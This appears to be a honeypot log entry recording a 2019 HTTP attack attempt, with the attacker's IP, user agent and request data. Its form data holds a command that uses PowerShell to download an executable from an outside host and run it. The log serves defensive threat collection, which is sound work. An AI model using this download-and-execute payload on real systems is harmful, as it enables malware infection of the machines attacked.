Attack dad57090-ea74-4a9c-8424-ef397813e31d
Details
ID |
dad57090-ea74-4a9c-8424-ef397813e31d |
Attack Type |
http |
IP Address |
124.205.27.10 |
Username |
|
Password |
|
Client Version |
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) |
Country |
China |
Date |
2019-01-19 04:05AM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "text/html, application/xhtml+xml, */*",
"Connection": "Keep-Alive",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Cache-Control": "no-cache",
"Accept-Encoding": "gbk, GB2312",
"Accept-Language": "zh-cn"
},
"hostname": "168.235.81.160:8080",
"form_data": {
"xcmd": "cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/6.exe')",
"start C:/6.exe": ""
}
}